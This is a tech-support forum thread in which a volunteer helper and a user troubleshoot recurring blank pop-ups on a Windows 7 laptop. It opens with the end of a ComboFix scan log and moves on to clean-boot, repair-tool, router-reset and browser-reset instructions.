S3 SymDS;Symantec Data Store;c:\windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\SYMDS64.SYS [x]
S3 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\SYMEFA64.SYS [x]
S3 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\Ironx64.SYS [x]
S3 SymNetS;Symantec Network Security WFP Driver;c:\windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS;c:\windows\SYSNATIVE\Drivers\NISx64\1503000.00C\SYMNETS.SYS [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-05-23 04:34	1091912	----a-w-	c:\program files (x86)\Google\Chrome\Application\35.0.1916.114\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-06-06 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-05-31 16:17]
.
2014-06-05 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25 04:31]
.
2014-06-06 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25 04:31]
.
2014-06-04 c:\windows\Tasks\HPCeeScheduleForHewlett Packard.job
- c:\program files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15 12:43]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00001YSISyncComplete]
@="{89B5F9CC-C4A2-462C-BD27-29CEAC972135}"
[HKEY_CLASSES_ROOT\CLSID\{89B5F9CC-C4A2-462C-BD27-29CEAC972135}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00002YSISyncActive]
@="{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}"
[HKEY_CLASSES_ROOT\CLSID\{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00003YSISyncError]
@="{306A9CDE-AC70-453A-8008-B5F9962B8F88}"
[HKEY_CLASSES_ROOT\CLSID\{306A9CDE-AC70-453A-8008-B5F9962B8F88}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00004YSILocalOnly]
@="{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}"
[HKEY_CLASSES_ROOT\CLSID\{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}]
2014-02-13 04:06	2994232	----a-w-	c:\program files\Hightail Desktop App\YSINSE64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-09-20 167704]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-09-20 392472]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-09-20 416024]
"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2011-10-06 1424896]
"SetDefault"="c:\program files\Hewlett-Packard\HP LaunchBox\SetDefault.exe" [2011-09-30 43320]
"Hightail Sync Agent"="c:\program files (x86)\Hightail Desktop App\Hightail.exe" [2014-02-13 7107640]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"NCPluginUpdater"="c:\program files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" [2014-05-27 21720]
.
------- Supplementary Scan -------
.
uStart Page = https://www.google.com.ph/
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
TCP: DhcpNameServer = 114.108.193.201 114.108.195.1 192.168.1.1
.
- - - - ORPHANS REMOVED - - - -
.
SafeBoot-91966428.sys
HKLM-Run-SynTPEnh - c:\program files (x86)\Synaptics\SynTP\SynTPEnh.exe
AddRemove-Adobe Shockwave Player - c:\windows\system32\Adobe\Shockwave 11\uninstaller.exe
AddRemove-InstallShield_{20DFF861-31EE-41F6-98D5-0A992AE7D116} - c:\program files\InstallShield Installation Information\{20DFF861-31EE-41F6-98D5-0A992AE7D116}\setup.exe
AddRemove-{EE202411-2C26-49E8-9784-1BC1DBF7DE96} - c:\program files (x86)\InstallShield Installation Information\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}\setup.exe
AddRemove-MyFreeCodec - c:\program files (x86)\MyFree Codec\1.0b beta\uninstall.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MCLIENT]
"ImagePath"="\"c:\program files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe\" /s \"MCLIENT\" /m \"c:\program files (x86)\Norton Management\Engine\3.2.2.12\diMaster.dll\" /prefetch:1"
--
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NIS]
"ImagePath"="\"c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe\" /s \"NIS\" /m \"c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\diMaster.dll\" /prefetch:1"
"ImagePath"="\SystemRoot\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS"
"TrustedImagePaths"="c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12;c:\program files (x86)\Norton Internet Security\Engine64\21.3.0.12"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_13_0_0_214_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_13_0_0_214_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_13_0_0_214_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_13_0_0_214_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.13"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Nico Mak Computing\WinZip]
"SymbolicLinkValue"=hex(6):5c,00,52,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
00,5c,00,4d,00,41,00,43,00,48,00,49,00,4e,00,45,00,5c,00,53,00,6f,00,66,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-06-06 11:14:31
ComboFix-quarantined-files.txt 2014-06-06 03:14
.
Pre-Run: 12,078,718,976 bytes free
Post-Run: 11,766,816,768 bytes free
.
- - End Of File - - 3691202014553FF98D1207CFBEE74CAF


----------



## emeraldnzl (Nov 3, 2007)

Okay we are not having much luck.

Let's take a completely different approach.


Click on *Start* then type *msconfig* into the *Search programs and files* box and hit the *Enter* key.
Click on the *Services* tab
Put a check/tick in the box next to *Hide all Microsoft Services*
Now click on the *General* tab and check the box *Selective startup* 
Ensure the boxes *Load System Services* and *Load startup items* are unchecked.
Check the box *Use original boot configuration*
click *Apply* and *OK*
The window will close and you will see a notification with two choices, click on *Restart*.
After reboot check to see if the problem still exists

If the problem has gone then do this:


Open *msconfig* again in the same way as before. 
Under the *General* tab and put a check in the box *Load System Services *
Click on *Apply* then *OK* and as before select *Restart* when the options appear.
Check again to see if the problem has returned. 
If it has then we are looking for a bad Service, if the problem has not returned we are looking for a bad Startup item.
SOoo... open msconfig again, leave the check mark for *Selective Startup* and check both the boxes for *Load System Services* and* Load Startup Items*

If it was found that we are looking for a bad Service click on the *Services* tab. Or, if we are looking for a Startup item click on the *Startup* tab.

Now you have the list in view and we know that the item responsible for the problem is one of them. You can go the long, but less confusing, route of disabling one at a time, clicking on Apply, OK and Restart and checking again, but that could take a long time.

A quicker method is to start by disabling (by unchecking the item/s) half at a time and restarting to see if the problem stops.

Once you isolate which half you can then just disable items in small goups at a time and so on until you narrow it down to the culprit/s

When the problem has gone you will know that it is being caused by one or more of the items you have just disabled.

Once you have isolated the item then post back with the details of what caused the problem.

To find the details hover your curser over the program name and the path details should appear. Write the path down and post back here.


----------



## raphael100 (May 24, 2014)

Thanks - I tried the msconfig with all boxes EXACTLY as you describe above and restarted. The ONLY difference was that the "Use Original Boot Configuration" box was already checked and grayed out (I could not operate it). The pop-ups are still evident.

Again - If I unplug my power lead and run off battery ... however freaky that may sound ... the popups do disappear ... consistently. Also - IE does not function properly. Chrome seems to.


----------



## raphael100 (May 24, 2014)

I went through your instructions carefully again and made an observation: When I un-check Load System Services and Load Startup Items under Selective Startup, and then click "Apply" the Load System Services re-checks itself in Gray (I cannot operate it to un-check it after that).


----------



## emeraldnzl (Nov 3, 2007)

Hmm... let's to this then:

Download Windows Repair (All In One) from here.

It will allow you to repair common issues with your computer such as firewall, file permission, and Windows Update problems. When using this tool you can select the particular fixes you would like to launch and start the repair process.

Please download the tool to somewhere you can find it.

Double click to open and follow the prompts to install.

Once installed click on the tab *Start Repairs* and the button *Start*

At the list that presents put a check (tick) in the following:

• Reset Registry Permissions
• Reset File Permissions
• Register System Files
• Repair WMI
• Repair Windows Firewall
• Repair Internet Explorer
• Repair MDAC & MS Jet
• Repair Hosts File
• Remove Policies Set By Infections
• Repair Icons
• Repair Windows Updates

Also put a check in the *Restart/Shutdown System When Finished* (lower right) box.

and in *Restart System*

Then click on the *Start *button if it doesn't do it automatically

If it asks you to back up your system click *No* and continue

When it is finished come back and tell me how it went.


----------



## raphael100 (May 24, 2014)

I have run the Tweaking.com scan. I followed all instructions and steps and checked all prescribed boxes. The 2 blank popups appeared one by one after the computer re-started. 

IE is still the same: I can search a topic, but *cannot* bring up any page from the search list. Chrome is still fine.

Again, if I unplug the power cable, the 2 pop-ups disappear immediately, and do not reappear until I plug the power cable back in.

My power settings are at 'High Performance' ... it seems that high performance makes the pop-ups appear faster than lower settings. As in a few seconds versus a minute or so. I know that power settings are usually nothing to do with these things ... but my observations are consistent.

... if I was a religious person I would just perform a quick exorcism on the thing!


----------



## emeraldnzl (Nov 3, 2007)

I have just come across a similar one elsewhere. In that one the modem/router was infected but the problem wasn't fixed by a simple reset. The the browsers have to be reset and dns flushed at the same time.

So let's see what happens if you do that.

Quite a bit to do but actually not as bad as it looks if you take it slowly and make a note before hand of all the actions required. 

*Now*

Reset your modem and before you restart it, flush dns, reset your browsers and clear temp/cache files not already cleared in the browser reset.

*Step 1*

For resetting your modem/router:

Some routers you can re-set quite easily just by rebooting them (which is what we tried last time) others need a different approach. Some types of internet (i.e. DSL connections that use PPPoE in the router), you will need to know the data to re-setup the router itself.

SOoo... let's:

Try turning off your router. Unplugging it from the wall socket, wait at least 30 secs and then replug; carry out the browser resets etc, reboot and then restart the modem.

That may do the job... but if not:

Most routers have a reset pin hole on the back. This can be done by inserting something tiny like a paper clip end or pencil tip into a small hole labeled "reset" located on the back of the router. Press and hold down the small button inside until the lights on the front of the router blink off and then on again (usually about 10 seconds). If you dont know the router's default password, you can look it up  HERE 

1. With the unit on, place an straightend paperclip into the hole on the back on the unit labeled *Reset.*
2. Hold the paperclip/reset down for 10 seconds and then release it.
3. The unit will reboot on its own. 
4. As soon as the lights stop blinking, the unit is ready. 
5. Log in to the router using the manufacturer's default username and password. If you dont know the router's default password, you can look it up  HERE 

_Note: If you changed your password, it will be gone so refer to your user's guide for your router._

You also need to reconfigure any security settings you had in place prior to the reset. You may also need to consult with your Internet service provider to find out which DNS servers your network should be using.

Some routers (like Netgears) need special reset instructions, if you are in that situation then you may need to consult with your ISP.

*Step 2*


Go to *Start* (bottom left of screen) > *All Programs > Accessories > *
RIGHT-click on *Command Prompt*
Select *Run As Administrator*
In the command window type the following and then hit enter: 
*ipconfig /flushdns* (note the space... it should be there)

*Step 3 - for your browsers:*

You will need to check out and copy the instructions for resetting because you will be off line while you carry out the necessary actions.

Go to the link below for instructions on how to reset IE9
http://windows.microsoft.com/en-US/windows7/Reset-Internet-Explorer-settings-in-Internet-Explorer-9

Try resetting Firefox to see if that helps matters.

Go to the link below for instructions:

https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-most-problems

Please go to the link below and follow the instructions on how to reset Google Chrome browser settings:

https://support.google.com/chrome/answer/3296214?hl=en

*Finally*

Download TFC.exe from *here* (Vista and above users right click and run as Administrator).

If you are asked "Do you want to allow the following program..." click yes.

The "Temp file cleaner by Oldtimer" console will pop up. Click continue and allow it to do it's job.

You may be asked to reboot when it is finished. Please do so.

If you are not asked to reboot you may be confronted with two windows. One will be the Temp File Cleaner console with a report of what has been cleaned. The other will just be a window showing your libraries etc. They can both be closed.

You are finished.

Time to try your browsers and see if the problem is gone.

Tell me how you get on.


----------



## raphael100 (May 24, 2014)

Thanks for the info. I have gone through it carefully step by step. The pop-ups continued all the way through the process even when i was completely disconnected from the router. The process did, however, make IE function properly again.  IE completely reset back to original settings. However, when I did the Chrome reset I noticed a bookmark I placed there was still on the tab. I tried reset several times. Still there. So next I will try uninstalling Chrome to see if that might help.

*Please note* : The pop-ups appear wherever I am physically - on any number of different routers in multiple location, so it seems router infection is unlikely.

*Please also note* : When I plug into the mains, the pop-ups appear. When I unplug ... they disappear. So it must have at least something to do with what the computer is telling itself when it is plugged in and out of mains power.


----------



## raphael100 (May 24, 2014)

I uninstalled Chrome completely. The pop-ups are still present. I am now using IE (which is now functioning properly for the first time after the above reset - Thank you)

*Please note: *When plugged in to the mains supply the 2 popups appear one at a time. As soon as the supply is disconnected the popups (immediately) disappear, both of them together. They reappear after a while one at a time every time I plug into the mains. Just to make sure my power pack is not possessed by an evil spirit, I used my spare. Same result. There must be something in the power settings?


----------



## emeraldnzl (Nov 3, 2007)

Well this is a conundrum.

I am consulting as I don't know what is going on.

Might take a little time as we work in different time zones but I will get back to you.

Oh, as an after thought, there were experiments with a power company ISP providing internet via the power lines. Your not part of something program like that are you?


----------



## emeraldnzl (Nov 3, 2007)

Hello raphael100,

I have a suggestion we can try.

Right-click the battery icon on the Notification Area and select *"Turn system icons on or off"*. From the drop down menu for *Power* select *Off* and click "*OK*".

Alternatively:

Go to start => Control Panel => Notification Area Icons => Outside the option box, down left of the windows select *"Turn system icons on or off"* => From the drop down menu for *Power* select *Off* and click "*OK*".

After this, connect to the power to see if the pop-ups appear.


----------



## emeraldnzl (Nov 3, 2007)

Further to my last post please also do this:

Download the attached *fixlist.txt* file and save it to the Desktop.

*NOTE.* It's important that both files, *FRST* and *fixlist.txt *are in the same location or the fix will not work.

*NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system*

Run *FRST/FRST64* and press the *Fix* button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.


----------

